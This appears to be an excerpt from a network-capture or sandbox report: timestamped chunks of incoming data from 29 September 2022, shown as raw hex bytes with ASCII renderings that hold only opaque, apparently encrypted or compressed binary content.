                                                                                                                                                    2022-09-29 12:59:10 UTC14821INData Raw: 31 93 7c 89 3d 96 f6 78 ca c9 7a f4 07 68 25 f4 5b 34 a0 df 99 af dd 29 da d9 18 17 8c e9 69 c8 b4 71 26 ce 96 93 cb f0 53 92 54 3f df 3d a1 4f 75 5a 45 4c f1 0a 5a 44 2b 8c 64 e3 f6 f0 9b 9a ae 1c 1d de 37 cd d5 11 e9 c2 05 57 7e d1 58 fd f2 c4 1f 46 ac af d8 10 11 9b 9b a0 74 83 7e 5a 33 4b ae 58 84 c3 f0 43 c4 41 6e 0d d6 51 8d 65 85 bb d7 79 72 22 2f b8 4d 9e 86 9c 23 c4 91 e6 0a 42 d1 65 9d 0f 2c 1a 8b e0 90 c0 7d 84 e4 f7 01 18 b2 24 07 1f ee de 05 3b cb e3 56 59 44 ab 00 a4 37 08 80 f0 87 6a 94 1e bd 29 62 27 de 75 06 d2 a0 0b 73 8a fb f2 94 b5 b3 79 93 61 f5 d1 75 fe 83 38 97 85 7d ab 84 9d 54 a7 7e 3a 51 7c af 8c 20 ed 1c e9 2c ef 78 84 13 ca 94 f5 b3 a0 98 fc c5 23 61 af 0f 63 5e 74 18 2f f9 0c a6 0e 26 9e 28 02 72 e8 a1 e3 af 85 6d ff 85 96 e6
                                                                                                                                                    Data Ascii: 1|=xzh%[4)iq&ST?=OuZELZD+d7W~XFt~Z3KXCAnQeyr"/M#Be,}$;VYD7j)b'usyau8}T~:Q| ,x#ac^t/&(rm
                                                                                                                                                    2022-09-29 12:59:10 UTC14837INData Raw: 8c b7 ec 8d 4a 49 16 53 ff f0 23 c2 cb 53 fe 66 01 5f 79 e5 86 d6 53 aa 6c c2 47 7e 0f 16 ae 61 19 7e 92 24 35 96 7a 99 b8 74 87 3b 2c f0 e0 94 65 b6 5c 0c 33 9a 98 28 ec af 18 04 fa b8 f5 96 46 58 6c 0d e2 34 e1 82 87 6d e4 66 67 9c 79 51 82 f9 d8 63 97 ff 01 d3 45 5a f6 32 57 da 60 e0 c1 3e 56 63 ec a4 52 44 5e c7 98 15 15 3d fd 8c 78 aa dd f8 0f af cb ed 38 cf bb 81 31 8a 0f b5 16 13 16 98 56 5f 2e 70 1c bf ac 35 bb 32 ae 45 22 0e 0e 20 16 ac ba 5a e3 80 6c 33 0a 18 ce b3 2f 0c 73 7a f1 a2 00 a0 ad 24 41 ab 86 28 6b 71 28 70 6f e0 6d 08 1b 84 db c0 68 39 7a ab e3 42 23 0c 6c ef 69 3c 3b 80 ab 92 74 7f 47 f0 85 73 6b 98 ae 73 6a b9 8d cf f5 85 77 df 07 d6 db b3 43 e0 b2 84 ad 84 8e 23 7a c7 ab 82 6b 84 ea a7 d9 d9 5d 6d 16 1e a4 5e a6 c1 61 99 99 39 20
                                                                                                                                                    Data Ascii: JIS#Sf_ySlG~a~$5zt;,e\3(FXl4mfgyQcEZ2W`>VcRD^=x81V_.p52E" Zl3/sz$A(kq(pomh9zB#li<;tGsksjwC#zk]m^a9
                                                                                                                                                    2022-09-29 12:59:10 UTC14853INData Raw: 88 17 bd 60 6e 19 30 ff ef 2a 0d 19 0b e4 ba c8 4a 8c 7a 33 18 e7 c9 b1 fb 8c 8e 83 27 4b 20 c8 f5 0f ec 2d 53 94 7f 11 b0 15 39 97 7b 1f dd 53 ff 01 fa 7d de fa 33 99 3e 46 34 06 94 73 b6 98 d1 fb a9 fd b7 ba e6 fd a5 8d d5 4e 7b 2d 10 7a 30 61 75 72 a5 27 5e 6c f2 96 cb da ae 4d 76 bb e2 b3 1e 8c 6a da d9 39 da 21 13 a9 65 c7 b6 d8 4d 53 70 d7 ab a3 2b 38 31 ec d3 43 2a 7b b4 76 68 14 01 c4 58 0d 7c 7f 72 54 ac 35 c5 20 73 54 ce 1d fe 60 fc 20 07 5e bf 60 30 70 80 cc e0 8e 28 fe 93 05 a5 e3 ef 4a 5f 3c 7c 2e aa 74 e1 3e 2b 07 8f ac 1c 99 50 58 4f 2e a8 9d 40 cb 30 f8 36 f4 b1 c4 3f 01 31 eb ca bc 93 2a 05 55 4b b2 21 d5 38 41 fe 67 1f 3b df b1 01 ae 0c da cd 27 71 68 6b fb 10 1e 14 b6 4b 1b fb 0e 12 b0 bf 36 3d 8e aa 59 81 28 8f 9c ba 54 f4 69 51 e0 ef
                                                                                                                                                    Data Ascii: `n0*Jz3'K -S9{S}3>F4sN{-z0aur'^lMvj9!eMSp+81C*{vhX|rT5 sT` ^`0p(J_<|.t>+PXO.@06?1*UK!8Ag;'qhkK6=Y(TiQ
                                                                                                                                                    2022-09-29 12:59:10 UTC14869INData Raw: 63 e1 e3 4e 07 84 70 cd 0c 4c 2e 72 af 15 56 fc 91 dc 77 3d 85 c0 71 1c 11 5c 78 70 3b a2 d0 42 b4 6f 90 6a 18 7d 7d e7 cd 93 50 7f 9a 30 84 78 72 4e fb a3 06 a3 21 90 ee cf 2a f0 7b 1d ac db 67 35 f9 4d 5f 0d 72 56 d3 93 bb 9d 2f ae f3 09 f0 c6 d9 94 a3 ef ba da 37 a4 7a 3c 4e 8c 48 3c 3b bf 74 3f cf 3a e7 1d 63 d6 2c bc 9a 46 13 93 1c 84 60 bd ba 84 cf cb 14 de bc a0 c2 f2 76 4c 4b 29 19 68 e7 76 6c d8 37 85 15 21 4d 4f 1d 7a d3 22 55 7d 8b 1a 1e c7 da e9 76 1e 97 5c cf 5b 94 0d 0c 91 62 10 32 6b 36 4a e6 14 d3 10 8a 25 28 ec 3b 1c 57 d4 2d ce 73 d3 95 b7 fd 15 3c 58 ca d4 80 be f9 52 25 6b 73 bf 4a 28 b5 ef eb e3 83 65 34 21 e0 f3 9c 60 a8 2c f4 41 76 81 42 49 dd 90 79 9e 1f 09 5b f8 69 41 17 2f 04 9d 60 ea 67 5e c0 73 06 52 43 5b 2b 02 28 13 3f a2 39
                                                                                                                                                    Data Ascii: cNpL.rVw=q\xp;Boj}}P0xrN!*{g5M_rV/7z<NH<;t?:c,F`vLK)hvl7!MOz"U}v\[b2k6J%(;W-s<XR%ksJ(e4!`,AvBIy[iA/`g^sRC[+(?9
                                                                                                                                                    2022-09-29 12:59:10 UTC14885INData Raw: e0 d1 4c cc 52 89 82 80 d6 43 e5 a5 c8 1f a1 61 ad ff 53 29 bd 92 35 ab 76 ef 4e 6b 95 a6 a8 56 63 14 1f 60 d3 b2 a6 27 d5 a3 6b b4 8f 6f 63 23 0a 82 12 40 6f 4d 4d 2f 89 65 65 4d 5a 7c 24 f5 e6 2d aa 19 67 51 aa 60 9a db b2 96 f7 fe 30 a6 f6 cf 0c a5 cb 46 84 1b d4 5c f0 a3 ef bd 63 24 53 88 77 49 ca c2 ce c0 df 0d 76 fc a2 3d 7c 49 64 ef 06 d7 17 79 ed 29 52 82 d2 43 a9 01 f1 48 59 fa 6a ce b4 94 e1 10 ec 20 71 e6 fc 7a 54 f3 ae 5f 8b d6 be ac bf 4f 9e e9 34 9e 2c 46 6d d4 43 48 32 76 94 72 7e 9c 13 c7 65 7d 82 a2 61 af 5f 07 ce 29 b0 c5 00 67 52 77 03 2d c7 56 bc b2 14 61 da ca 61 39 88 57 a6 f9 72 55 dc e9 d3 50 d4 8b 87 18 51 54 cb f9 09 27 52 3c 64 2e 71 7c b6 83 d9 2b 33 e0 4e b6 c6 58 4b 22 99 1e 40 64 84 ce 37 48 eb 4b 5d 29 d0 3f 84 9e 36 62 59
                                                                                                                                                    Data Ascii: LRCaS)5vNkVc`'koc#@oMM/eeMZ|$-gQ`0F\c$SwIv=|Idy)RCHYj qzT_O4,FmCH2vr~e}a_)gRw-Vaa9WrUPQT'R<d.q|+3NXK"@d7HK])?6bY
                                                                                                                                                    2022-09-29 12:59:10 UTC14901INData Raw: 8d ba 52 41 62 0d 7b 5c c4 d6 e7 16 d1 70 60 00 96 7a f2 4d f1 5f 8b 74 ff 86 18 a5 30 82 00 88 bc 5a c7 88 53 8c 8f 34 a9 8b b2 fb 91 cb 1b d0 c9 06 45 31 a0 47 3b c1 69 a4 ae 31 59 61 fa 72 c9 eb da d0 8a a2 a8 58 2c 0e 38 2a 99 0d 15 a1 9f 84 fd c5 ae d7 2a d9 95 d2 55 46 0b 60 40 f8 95 6d c5 09 20 c3 94 8d 45 d5 d3 42 e5 40 e0 e9 f2 32 3d ee 48 fe 68 e9 70 6a f9 91 0e 28 42 7b 59 c6 61 59 41 fd 4d 74 13 e7 a5 6e 4d 84 76 e9 fa 65 35 72 cd c5 d2 c7 90 bb 26 20 77 6d 24 63 64 69 e6 c6 a8 f6 b1 57 33 f3 0c e2 68 96 1e c5 08 af 74 78 a9 58 14 bb 88 33 dd ed 7a d6 32 aa 48 20 6c 04 31 56 67 06 02 39 11 a4 b0 f6 b2 c5 b7 8e bb 36 88 42 6d f7 2f af ce 12 6a 7f a8 97 39 a5 88 17 e5 37 8c 36 45 69 b2 42 3b 6b 05 39 c0 42 b3 ab e2 b6 a5 7a b1 ee a9 b5 69 ff 13
                                                                                                                                                    Data Ascii: RAb{\p`zM_t0ZS4E1G;i1YarX,8**UF`@m EB@2=Hhpj(B{YaYAMtnMve5r& wm$cdiW3htxX3z2H l1Vg96Bm/j976EiB;k9Bzi
                                                                                                                                                    2022-09-29 12:59:10 UTC14917INData Raw: ec e3 97 a8 ef 41 05 2e 17 39 6e e4 98 56 b1 6c 75 9d ab 53 1e 34 20 ae 0b c1 a5 56 31 c1 92 f7 16 3b 51 08 4b 30 84 47 a5 af 0c 35 d4 b6 c4 b6 29 57 d7 dc 06 0d 0e 82 78 e7 71 68 c7 9c ef 56 c7 bd 7a bc a0 1f 34 7c 2e 2e 31 0d f7 e4 f7 9c fe 3e 1a 47 ed 61 d4 e4 49 10 15 3c e2 4c 87 ec b6 3c 8f b8 13 0c 29 27 91 ce 49 93 f0 93 79 4b 3f 36 6f b2 e3 27 1e 35 62 62 96 3b 0b e4 20 e3 e5 20 8d 8c 6d fb 37 ef cb a4 78 b3 33 86 88 57 53 ac 38 f2 8c 4a d8 1f 37 e9 bc a3 c7 28 e9 c7 c2 7c 51 25 f3 f3 6a b5 52 89 56 60 fe 91 e7 fa 81 dc f0 4b 07 cc fc 9e e4 e8 e4 7f 96 76 0c 92 86 bd 13 6d 78 25 2f ba 6c 34 97 7c 06 0e bd b2 d8 9d 35 71 7e ea 3f 3b a4 e3 68 af a1 bd a7 e8 a9 dd 00 51 63 38 9b e8 a9 e8 2d 0a 46 72 25 60 bf f6 6c d6 9b 8f e6 5e 3f ba 74 d8 31 ea af
                                                                                                                                                    Data Ascii: A.9nVluS4 V1;QK0G5)WxqhVz4|..1>GaI<L<)'IyK?6o'5bb; m7x3WS8J7(|Q%jRV`Kvmx%/l4|5q~?;hQc8-Fr%`l^?t1
                                                                                                                                                    2022-09-29 12:59:10 UTC14933INData Raw: 5b 91 26 ca c8 32 89 ab e3 5a 29 4d ad a7 f8 30 ca 38 e5 3f e8 4c 9e fb b4 a3 e7 ac 42 7a 5e d5 4e d9 11 d4 aa 00 03 c4 04 d4 a7 e1 e5 40 33 37 fa 47 f8 b6 a5 73 4b f1 b5 15 52 68 85 75 fd 66 5e 43 9a 51 0f 7b 58 51 3a 7e ad 1f f5 36 5c 8a 9f 18 e2 b8 98 51 96 e0 02 4f e3 24 31 90 fb fe 21 16 d0 ab ae f6 c3 2b 58 fa 7e 0f 82 9f 69 87 47 cc cb 29 83 58 4b 4f 47 cb 5f 3b 66 13 81 79 3e c9 ad d7 9c bf 87 13 d1 b1 07 5d f1 9e ef 1c 36 1d 68 d0 8d 84 13 96 50 a4 82 95 d9 76 1a 28 75 8e e4 d7 41 71 c2 fe c5 f5 74 19 23 62 45 4d 85 b1 85 db b8 12 1c 0b 46 83 23 f9 67 b5 38 8e 89 07 32 f8 cb 64 53 db 58 9a 70 6e 61 8d a3 ff db 6a e8 08 1a 80 21 74 c5 2f 77 4d 53 5b 14 06 3b 33 4d 23 7e 76 a7 f9 c6 90 4c 66 32 6c ed e3 3f 70 bc 4b 22 e1 1c 8f bc ff 0c 2a 61 da 71
                                                                                                                                                    Data Ascii: [&2Z)M08?LBz^N@37GsKRhuf^CQ{XQ:~6\QO$1!+X~iG)XKOG_;fy>]6hPv(uAqt#bEMF#g82dSXpnaj!t/wMS[;3M#~vLf2l?pK"*aq
                                                                                                                                                    2022-09-29 12:59:10 UTC14949INData Raw: 68 6c 50 3d 71 66 56 c8 72 f8 66 f4 57 be 2b b5 3d cc 64 1a ab c9 1a 36 bb 29 c7 66 c7 19 19 b3 26 3c a6 0b 2e 9f 9a fd ec 83 7d dc 54 c0 a9 7e 1e bf 27 33 57 e2 24 5d ce c3 53 ff ed ca 5a 9f 61 cb e3 ac e2 e7 f0 4e 75 9d 78 f1 84 dd fe eb 30 12 ad b9 95 59 fa 12 e4 6f 0c 68 04 14 73 52 68 d6 14 23 5f 11 c3 23 b8 dc 05 7e 33 04 4d fe d9 38 9a ec cb 4b d8 35 f3 33 25 20 55 22 ec f6 66 14 02 6f fa 33 82 cd 8a 01 32 b7 09 bd 15 42 b1 b3 e4 38 88 9d 69 05 a7 20 77 97 dc 3b cd 77 5f dd d9 1e 86 89 d3 29 0a 63 7e bb 0c 4d 0c c6 b9 4e 7e 49 54 92 6f ef 63 ce 91 45 97 75 75 5c f0 4c 99 ef 0d 47 a0 c7 da 32 f9 9f 4a ea 8f d9 a0 19 08 b2 ad 82 6a 0c 74 2f e0 b0 ba 93 d7 25 6f b2 36 15 5a 12 94 0f 8f 84 75 b3 91 2f 11 19 1b 36 4d 65 7d e8 08 5f a5 9d 29 8b 67 dd 94
                                                                                                                                                    Data Ascii: hlP=qfVrfW+=d6)f&<.}T~'3W$]SZaNux0YohsRh#_#~3M8K53% U"fo32B8i w;w_)c~MN~ITocEuu\LG2Jjt/%o6Zu/6Me}_)g
                                                                                                                                                    2022-09-29 12:59:10 UTC14965INData Raw: 5b df 50 22 6e ac ad 2c ff 8d cd 41 42 dc 66 0d 16 d8 f2 a3 7c 52 dd 6b 3d 5d a2 3a 87 bc b1 2c 76 27 67 48 4d 2a b5 56 e7 98 e2 be 4d c2 7d 4c b2 9f 87 e8 65 f4 f1 d1 68 8a 8f 5f d7 24 68 c6 b2 2c 49 9f 76 c9 29 b5 d2 b5 e7 1b 11 70 83 c1 9a f9 2e 8c 23 ad 43 41 ca 83 dc 6f 6f 6e 73 7d 3a 06 cc cf d3 8b 1d 1b de 04 e4 c2 8a 97 f0 98 6f 95 7a 33 63 d6 b0 8b 06 30 c5 84 67 ef f2 22 a7 b7 12 f0 7e 55 4d ed 10 f9 33 5c e4 06 a5 66 60 44 da fb 3e 76 97 ec 0d 53 4b 81 90 a0 a5 ee 73 30 13 36 cb 37 ce 47 4f ef e4 82 3d 51 7b 5e 30 5c e4 90 b8 a6 70 e2 66 46 a4 e2 11 51 0b f3 39 6a e4 36 21 46 2d c8 8d 86 80 ae f8 1e ea 03 c0 af 49 11 51 58 3d d8 7c b7 f4 36 c6 5e 1e a3 6d c3 ca 0f 57 38 6d 00 65 3c ba b2 79 02 1a 1d 1f 58 8d 26 c0 8f 2f 9c a7 43 63 b7 2e 6d 02
                                                                                                                                                    Data Ascii: [P"n,ABf|Rk=]:,v'gHM*VM}Leh_$h,Iv)p.#CAoons}:oz3c0g"~UM3\f`D>vSKs067GO=Q{^0\pfFQ9j6!F-IQX=|6^mW8me<yX&/Cc.m
                                                                                                                                                    2022-09-29 12:59:10 UTC14981INData Raw: 4f a0 88 e7 7d 09 e2 a8 b3 a8 b9 a9 7d 34 f7 bc e5 2b d0 08 8b c2 89 f3 e2 3c 8f 83 f3 87 b9 70 b9 a3 8f 3a 24 da ab 19 61 d4 bf 6b 7f 6e 5f 30 3b 04 35 73 fb a3 3a 5d 8f 30 35 3b 63 ce 6e a2 e2 22 27 de 1c 27 e7 50 99 29 73 b1 8c 87 8d 77 56 62 cc 57 a0 8b 1c 75 51 f3 6f 25 03 68 10 f5 82 ca ab 0f f4 e5 c0 0e 8f 2a d2 3e 52 8a 4e 15 79 62 28 08 fe 39 89 a3 eb 09 f8 4b ff e9 a7 c2 68 f9 bb 7d 23 a7 ac e0 b2 07 6e 40 75 7c cb d6 99 dd 82 45 98 a4 7d 56 49 70 52 c3 1a 61 96 7a 3c 24 ab 08 33 df 78 a5 6b 15 51 f6 43 5a ac 1e 4a 35 6f 42 1c 77 d5 ac 52 6e 12 a4 16 cb ac 4d eb c6 e2 a5 13 33 56 20 f5 3c 6b 2d 46 06 43 cb 1f d1 3c 6e a6 1d 15 99 37 02 4b c7 0f a6 4b 78 c7 3b 38 92 86 6a 15 2d f8 82 d1 b0 05 ef 20 1d ce 4e dc f1 0f d0 d1 9a 5a ae 4c d7 c4 ca 44
                                                                                                                                                    Data Ascii: O}}4+<p:$akn_0;5s:]05;cn"''P)swVbWuQo%h*>RNyb(9Kh}#n@u|E}VIpRaz<$3xkQCZJ5oBwRnM3V <k-FC<n7KKx;8j- NZLD
                                                                                                                                                    2022-09-29 12:59:10 UTC14997INData Raw: bd 5a 35 8d 3f 42 4c 4c 6a b7 69 43 f4 f6 d4 7c df 09 6f ec d5 b9 a0 28 5c 07 28 ee f6 37 9f 25 02 aa e3 14 40 0c 60 22 e8 ad 97 e2 c9 da ba 05 3f 12 ec d5 53 28 3c d8 fd 58 7f e6 b1 c5 fe ea 4c 47 6e 16 28 7a a8 57 cc eb 46 8b 4b 69 8a 68 06 cd 56 e4 8c 2e 9d 09 a5 d1 95 5d 98 36 a3 05 a9 f6 7d 60 16 47 b7 b0 02 6e ad 85 78 6f 4e 3c e1 a1 c4 d7 08 ab 8b 03 7e 9e d1 44 4f 2c 9f ac 17 2d 21 0c d3 9d 5f 6e 2f 63 d4 80 35 23 a5 03 ad 47 f6 7b b4 07 65 a4 75 e9 00 cd af 4c c7 f3 93 4d 21 a9 a5 ea e3 dd b9 f3 78 cb 8b 66 34 ed 67 1b c4 f7 c2 28 41 39 bf ea db a9 07 82 35 4c 71 ca a9 a0 27 14 86 25 04 e8 d0 1b b4 75 83 ba 48 df 4a 9b f3 66 5b fb 65 97 d1 e6 83 03 e3 e5 4d e8 b7 a7 3b 57 37 68 ff 7d 89 c5 0c e0 d4 64 50 fa fc ca 9a 70 d5 d3 f8 ce 9b 96 66 01 25
                                                                                                                                                    Data Ascii: Z5?BLLjiC|o(\(7%@`"?S(<XLGn(zWFKihV.]6}`GnxoN<~DO,-!_n/c5#G{euLM!xf4g(A95Lq'%uHJf[eM;W7h}dPpf%
                                                                                                                                                    2022-09-29 12:59:10 UTC15013INData Raw: 98 a3 8a 99 63 98 27 15 5f b4 92 e0 81 85 4a 80 c0 90 93 3b d7 a8 a1 6a 2b c2 fa e8 39 5a 6b ef a7 70 f8 4b 52 2d 0d 2e d3 6b f4 e4 cc 82 c4 6a 60 d1 3e dc 4b 3c 62 96 cc 01 10 44 bb a0 33 1a a3 ad df 2a 17 f8 7a c4 f8 6f 71 c3 39 cd 1a 21 ef 83 d9 f8 b4 a8 1f 77 71 68 1b 6b b8 b8 9a 5d 7a 5d c2 fa 98 12 bf 3f 21 d1 7b e0 15 46 8e 49 47 0d 65 06 dd 22 fc ec b9 84 27 bb a8 90 60 7d 7b 3e e5 e0 fe 45 51 e1 48 f1 ca d9 98 98 39 69 ef 6a 6a 7b ad df 45 2c 3b ad e1 14 1e cf 27 98 85 8e 5f 24 45 ad 5a cc d6 ec 02 dd 83 94 9e 1c 58 3e b3 f1 75 ac 7b 6d 5e 4a c1 b2 5b 82 8b 21 16 78 c1 91 8a d7 40 f6 37 b7 c3 28 c6 5a e6 88 08 62 a8 b4 d9 f5 b5 b7 a3 0b fa 9e cf 02 19 58 a8 22 39 c0 63 8a 0c f5 ac 7b a8 9e 4f 54 25 de 7c 0f 8e 7c 3d da 1c f6 64 00 8f dc d7 c9 c6
                                                                                                                                                    Data Ascii: c'_J;j+9ZkpKR-.kj`>K<bD3*zoq9!wqhk]z]?!{FIGe"'`}{>EQH9ijj{E,;'_$EZX>u{m^J[!x@7(ZbX"9c{OT%||=d
                                                                                                                                                    2022-09-29 12:59:10 UTC15029INData Raw: 1d 71 c4 16 fe e3 57 7f 74 d5 3d 81 b1 4b cb 1c 96 30 c6 0e 6f e0 51 08 b4 b2 5e 7f 7a 2f 7a e1 8d 43 e2 59 5d c2 e7 21 38 da fd 96 3a b6 28 1d 68 e2 b7 c0 56 2f d2 cb 84 f8 9b cd f3 f2 f8 f0 52 97 61 e5 47 fd fd 7c 2b d0 7d 28 78 61 44 d7 5f d3 4b 4a 33 e7 04 32 92 70 db 81 5a 8c 8c c5 e4 5e 2e b2 78 fe 1e 32 e3 1b 80 0d c3 ed e5 7b 51 52 3f 65 ec 61 fd 6b d6 55 dc 8b be 50 45 19 33 ae 2f 91 91 c0 bc dd a0 f2 99 c8 fb f6 0e 7e e6 5c 7d a7 f5 61 c6 1d 43 10 7f c0 f7 21 12 7c 00 4c 19 58 74 17 d4 52 50 ad 81 80 94 a7 4f a1 14 4d e0 6e df d0 33 8f 94 6d 47 3c 7b 30 1d aa fa 98 41 57 ff 3a b4 2f 60 6c c7 41 6f 27 cb 35 2a 3d 6a 16 b1 b9 fa b9 6d 85 04 c4 84 b0 98 8b 6c 08 71 d4 c7 cc df c7 3d 94 b6 3f ca f9 9c 4a d4 b7 42 84 bd c0 21 ea bb 77 60 61 46 58 7f
                                                                                                                                                    Data Ascii: qWt=K0oQ^z/zCY]!8:(hV/RaG|+}(xaD_KJ32pZ^.x2{QR?eakUPE3/~\}aC!|LXtRPOMn3mG<{0AW:/`lAo'5*=jmlq=?JB!w`aFX
                                                                                                                                                    2022-09-29 12:59:10 UTC15045INData Raw: 6a 53 2c c0 07 54 9a 60 ef 26 6e c1 ab 8a b8 71 f4 5d 7d 7e dd 92 fc 68 66 d7 0e 1f 7f b0 f6 27 67 6e 77 03 67 c9 5d b6 a6 45 89 3c 18 4d 6d 89 68 bc 43 f0 75 fd 8d 29 16 5f 5b 3b d2 5d 27 76 3a 4f 6c 9d 0d cf dc aa 11 49 b6 c8 8c 36 96 14 e8 04 a8 81 fb 54 67 6c 63 2b 28 b3 15 90 3b 26 c0 de de 44 49 98 cf a1 5e 69 17 66 df c1 14 cf ee 5e 73 18 c2 04 a9 32 04 c7 75 8e e7 09 74 23 9d db 1f 75 87 dd 92 fb 41 6b 94 5d de 4c 32 69 dd 3f 15 c1 82 e9 9b 3a b0 5a 05 0f 27 ae 33 a6 fd 16 7e 4a 40 ee c5 c0 29 05 71 de 0c cb e6 4b 52 39 43 78 ae 55 8c 96 17 1b 5e f1 b2 c2 fc 04 84 c1 46 86 79 34 f0 15 74 a7 4c 39 ec 78 9c e5 54 dc 36 35 19 9d 50 83 24 91 95 32 6a 81 68 fc f0 e3 cd 99 14 91 fc 8b 83 1f c7 74 6f 5f 5a d6 44 49 74 f8 a1 16 2f 6c 5f 94 9f 4d f6 01 99
                                                                                                                                                    Data Ascii: jS,T`&nq]}~hf'gnwg]E<MmhCu)_[;]'v:OlI6Tglc+(;&DI^if^s2ut#uAk]L2i?:Z'3~J@)qKR9CxU^Fy4tL9xT65P$2jhto_ZDIt/l_M
                                                                                                                                                    2022-09-29 12:59:10 UTC15061INData Raw: 76 ef ae 8f af 07 4e 47 8f 45 0a 57 d5 71 a3 a0 c4 44 6f 11 11 cd 12 f1 84 3d a0 02 39 7c ea 63 8c 4a 5b b4 94 9f ff dd f1 20 9d ee aa 8d df ef 98 c7 2c 25 b3 7f eb a5 bd 52 67 78 4c ff 2b 37 20 6e b4 c1 6f 3d d0 43 92 16 ac ab 0a 9c 55 3b 82 50 a0 a2 e1 5d 2f 6a 51 39 bc e9 2d d0 14 51 03 08 4a 95 95 bf ec 46 46 b8 78 b9 5e ae 03 b3 76 cd da cd 26 17 2d 3e 23 a2 8c 2b be 2e 89 3c 63 ee b2 67 cc 71 37 50 4e 3c ee fc 40 00 8b 9d 78 c1 b8 00 af 66 8c 4a 17 7a 84 d2 bc 31 5c 8d c6 bd 13 d1 10 e0 19 43 07 97 23 74 85 0f 5a 63 ac ee 9a 6e 22 6e 36 65 14 d1 8a 15 05 f1 1f 1d 37 a0 36 77 d9 31 4d db 5a 31 7e 4d 6a f8 eb 0b 20 e3 53 eb 73 8a 19 8f 1b 38 d9 3a ec dd 25 e9 e2 21 bb be cd 70 24 2c 35 ca ab 0f 32 72 d0 7d c0 a8 18 94 2b 78 2e cd 13 0f 45 88 d9 56 c7
                                                                                                                                                    Data Ascii: vNGEWqDo=9|cJ[ ,%RgxL+7 no=CU;P]/jQ9-QJFFx^v&->#+.<cgq7PN<@xfJz1\C#tZcn"n6e76w1MZ1~Mj Ss8:%!p$,52r}+x.EV
                                                                                                                                                    2022-09-29 12:59:10 UTC15077INData Raw: a8 46 fe 0b 1a 6d 17 4c 4d 8f d2 56 98 73 eb 80 a5 1d 88 eb 83 13 e8 ff 96 84 31 96 43 2b 7b c9 7b 11 e6 00 86 01 7a 27 69 3b ea 89 25 03 e5 1c ad f0 07 99 cf 1c 53 88 61 d0 36 d0 36 46 d6 9f ac 23 ec 43 7c c7 56 62 b5 d7 dd 77 e7 11 cd ae 2e d1 49 61 7e 72 5f 29 cb 37 30 f1 6d 06 1b 97 a8 e9 b0 5c fe ee e0 21 1f 52 54 2f 9d a9 c5 db f6 a4 b7 85 b8 bd 1a 0c 2f 40 20 23 28 a0 f9 af c4 47 ff 73 0e c3 9a 9c 0b 75 e0 49 fd 70 af 62 3c 42 37 0f 8f 16 4b 02 fd f9 ae b7 8f b3 ef 3a 51 ec e1 63 6d 88 71 a4 10 3f 89 4a 05 07 61 da 30 f3 3d 7d 4e b5 53 78 e8 10 c8 b4 ec a3 2e d1 e5 30 d9 58 fc a0 98 d1 cd 58 0d e3 75 72 88 0d e8 e2 e5 27 ce d4 9b d3 a2 a6 f8 f5 9d 30 a0 dd 1c 47 b0 ca fa b4 83 56 a2 05 55 45 49 0c ef df bb b5 02 a4 dc 27 1d 71 d1 48 94 b0 58 a1 74
                                                                                                                                                    Data Ascii: FmLMVs1C+{{z'i;%Sa66F#C|Vbw.Ia~r_)70m\!RT//@ #(GsuIpb<B7K:Qcmq?Ja0=}NSx.0XXur'0GVUEI'qHXt
                                                                                                                                                    2022-09-29 12:59:10 UTC15082INData Raw: 80 1e 98 bc a2 43 cf 9f 27 88 14 95 f3 23 0f 2a 36 34 c2 4c 6f 55 95 5e 62 7c 3b b2 70 67 f5 ea fc 29 bc 17 cd 4f 1d 87 b8 ff 42 d3 26 dd 27 3f f0 8c f6 f6 a9 1a 00 e5 aa 56 6b 0e 58 99 6c 5a 8c 8b e2 ea 0c 9f a3 0f d6 f9 11 d6 c7 53 70 94 39 b9 43 03 00 79 71 c7 a5 6e a9 6d 4b 6d dd 09 78 52 0e 17 f2 36 c5 3a e7 99 36 41 3c 45 72 7e 5d 10 4d 93 31 cf 5f 6e 50 a5 13 0a 3e aa 44 ce 41 6a d1 78 9c 8d c1 fb 12 29 6c 68 10 88 41 47 a3 ef 54 9c e0 bc 25 4f eb 28 cd 79 e9 19 33 a5 11 9d 36 87 ad db 4a 5a 36 5a 58 cd bf 4e 66 2b 32 d4 d6 d2 83 65 fe 4c 78 10 ec d6 35 7f 17 29 24 65 14 8f d2 02 1d 39 48 31 bf 52 5f 16 e5 38 a8 4d fd 98 97 18 41 61 41 12 14 09 d1 57 e3 d1 70 52 38 3b e7 c0 35 0d 0c 2e ee ba 2e 42 26 0c 5a e2 5b 7e e4 67 66 4d 02 6e 63 b9 17 05 93
                                                                                                                                                    Data Ascii: C'#*64LoU^b|;pg)OB&'?VkXlZSp9CyqnmKmxR6:6A<Er~]M1_nP>DAjx)lhAGT%O(y36JZ6ZXNf+2eLx5)$e9H1R_8MAaAWpR8;5..B&Z[~gfMnc
                                                                                                                                                    2022-09-29 12:59:10 UTC15098INData Raw: dd d9 39 5a 16 d9 eb 9b e3 92 20 30 80 0f f6 2a 70 d5 44 a5 68 1c 1b 27 f2 d1 49 cb ab 57 30 72 6e 77 e2 db fd 2b a2 e8 43 49 46 2b ab 65 c6 9b 4f 85 e7 fd 6e 5a 9e 2a 3e 88 35 85 9f ec 17 42 8f b2 cf 60 57 c6 48 26 7a ab d1 af 20 17 3a 54 80 e7 a9 bc aa 37 f2 04 1d b3 0b df 22 bf 38 1f 45 ba 71 a7 4a 97 4d 71 e4 6f e9 da b3 f9 42 04 9e 85 bb b4 39 93 30 f9 7e af 84 c1 8b 9f fb 93 e8 f3 60 f5 ef f1 81 de 89 b3 02 29 3f 11 50 00 83 84 83 1c 55 d5 f0 86 c9 61 0a 6f 0e 2c dd 2f d9 57 c3 00 7c 9a a5 1f f0 e4 22 1d 49 bd 98 e8 23 a7 2e 30 f8 22 4c ec 7b bb 22 c4 1c 30 42 19 1e 1c f6 7f 38 7e cc 79 1f 63 b3 da f5 b3 59 e6 e1 f4 cf 19 d4 1f 1e e5 26 bf da 1c 46 27 33 0a fb 49 47 50 41 95 ec 47 ed 4c f0 85 f8 e8 3f d6 d6 c3 e6 a8 40 03 23 58 46 c1 4d 06 2e 90 b1
                                                                                                                                                    Data Ascii: 9Z 0*pDh'IW0rnw+CIF+eOnZ*>5B`WH&z :T7"8EqJMqoB90~`)?PUao,/W|"I#.0"L{"0B8~ycY&F'3IGPAGL?@#XFM.
